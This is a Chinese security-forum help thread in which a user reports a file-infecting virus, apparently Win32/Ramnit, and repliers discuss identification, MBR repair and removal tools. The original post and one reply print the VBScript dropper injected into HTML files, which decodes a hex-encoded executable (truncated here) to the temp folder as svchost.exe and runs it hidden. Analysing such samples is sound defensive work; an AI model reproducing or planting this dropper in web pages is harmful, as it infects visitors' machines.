首页
社区
课程
招聘
[求助]中了病毒好恶心 重做系统还在 会感染在EXE DLL上
发表于: 2016-4-21 13:23 10701

[求助]中了病毒好恶心 重做系统还在 会感染在EXE DLL上

2016-4-21 13:23
10701
会给机器全部html添加脚本病毒
</html>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData =

"4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

然后全部的EXE和DLL文件 尾部增加了一段代码 我用WINHEX抓了图 IDA看了  我看不懂是干么的 而且杀毒居然不报毒
这增加后的文件不会报毒
释放出来的那病毒文件 杀毒就会报
可重做了系统 之前感染的文件会重生 病毒上传了 谁帮看看啊 !QQ杀毒 360杀毒 只能杀脚本病毒 杀不了根 过几天又冒出来了 又全部感染一次dll exe html文件 而且整个路由器都出问题 打开网页都莫名的出现视频广告 但看不到图像视频广告 只听到声音

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 0
支持
分享
最新回复 (8)
雪    币: 7
活跃值: (13)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
只有mbr藏身了,dg恢复mbr,卡巴斯基扫描,如果有关路由器虚拟端口
2016-4-21 13:58
0
雪    币: 1176
活跃值: (1304)
能力值: ( LV12,RANK:380 )
在线值:
发帖
回帖
粉丝
3
哈罗 我恰巧前几天分析过好像好像 我是说好像你这个病毒。。。。
然而我分析的这个病毒把某个服务器弄瘫痪  (原因是没装杀软...   
我这个是可以被杀软查杀的,因为可以被杀软查杀 我也就没发帖子了(貌似很久没发了。。。
我这个病毒的流程是:
黑客工具->释放病毒(UPX的壳+自建内壳)->自解压并释放一个病毒->启动病毒,注入IE->不断感染能感染的文件,撑死服务器->IE向外连接三个IP地址->工作需要 停止分析。
2016-4-21 14:19
0
雪    币: 485
活跃值: (113)
能力值: ( LV4,RANK:40 )
在线值:
发帖
回帖
粉丝
4
中的是 Win32/Ramnit 病毒

b07K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2E0K9h3y4J5L8%4y4G2k6Y4c8Q4x3X3g2U0L8$3#2Q4x3V1k6K6k6h3y4#2M7X3W2@1P5g2)9J5c8Y4m8G2M7Y4c8S2L8q4)9J5c8Y4c8Z5M7X3g2S2N6q4)9J5c8X3g2F1j5%4W2U0L8r3!0H3k6h3c8A6j5g2)9J5c8X3g2F1N6s2u0&6i4K6u0W2j5i4y4H3P5q4)9K6c8V1&6S2L8h3g2Q4x3@1c8i4K9h3^5K6x3W2)9J5c8W2u0S2L8h3&6A6N6l9`.`.

专杀工具下载:

8c4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4m8S2L8W2)9J5k6h3u0S2K9h3c8#2i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8U0q4U0x3r3M7I4j5i4b7$3

建议你多跑几次专杀工具!!!
2016-4-21 15:07
0
雪    币: 6
活跃值: (19)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
有次感染了鬼影病毒也是重装系统没办法,后来把硬盘mbr引导重新修复了一下才弄好。
2016-4-21 19:07
0
雪    币: 12087
活跃值: (18961)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
这么恶心的病毒,杀软还是得安装的
2016-4-21 20:38
0
雪    币: 13
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
在科锐学习,前几天周末作业刚分析了这个样本,上传一个修复被感染文件的dll和源码。写专杀的话先将IE傀儡进程关闭然后将注册表的开机启动项清除然后全盘文件检查修复。
上传的附件:
2016-4-22 01:30
0
雪    币: 8712
活跃值: (3280)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
都好厉害呀,只会手工呀
2016-4-22 11:31
0
雪    币: 8712
活跃值: (3280)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
记事本打开html,从4D5A开始到000000终止,复制,打开WinHex,Edit/Clipboard data/past into new file,对话框中选ASCII Hex,OK,保存为a.dll。这是一个UPX压缩的,故UPX -d。IDA分析吧,看不懂了!
html中脚本的作用就是将文件释放为svchost.exe,并执行吧。
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "  "   exe 文件的内容
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
VBScript不太明白,系统不太熟悉,请高手接着爆料。
2016-4-22 11:44
0
游客
登录 | 注册 方可回帖
返回